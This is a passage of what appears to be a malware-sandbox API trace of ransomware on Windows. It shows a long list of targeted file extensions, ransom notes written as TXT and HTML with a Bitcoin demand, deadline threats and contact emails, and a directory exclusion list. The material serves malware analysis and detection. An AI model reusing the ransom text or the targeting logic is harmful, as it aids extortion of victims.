pp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.574] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.574] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.574] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.575] CloseHandle (hObject=0xffffffff) returned 1
	[0167.575] CloseHandle (hObject=0xffffffff) returned 1
	[0167.575] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0
	[0167.575] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.575] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.576] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}"
	[0167.576] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*"
	[0167.576] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.576] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.576] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 115
	[0167.576] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.582] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.582] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.585] CloseHandle (hObject=0x390) returned 1
	[0167.587] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.587] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.587] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0167.588] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.588] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.589] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.589] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.589] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0167.589] CloseHandle (hObject=0x390) returned 1
	[0167.590] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.590] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.590] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.590] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 116
	[0167.590] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.591] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.591] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0167.593] CloseHandle (hObject=0x390) returned 1
	[0167.599] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.599] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.600] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0167.601] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.601] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.602] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.602] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.602] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0167.602] CloseHandle (hObject=0x390) returned 1
	[0167.603] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d6b3081, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.603] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91
	[0167.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.603] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 0x5b
	[0167.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.604] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="windows") returned 0x0
	[0167.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.604] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="boot") returned 0x0
	[0167.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.604] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="temp") returned 0x0
	[0167.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="program files") returned 0x0
	[0167.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="appdata") returned 0x0
	[0167.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="application data") returned 0x0
	[0167.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="winnt") returned 0x0
	[0167.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="tmp") returned 0x0
	[0167.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="cache") returned 0x0
	[0167.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="webcache") returned 0x0
	[0167.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="packages") returned 0x0
	[0167.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="cookies") returned 0x0
	[0167.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpSrch="programdata") returned 0x0
	[0167.609] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.609] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d6b3081, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.610] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1
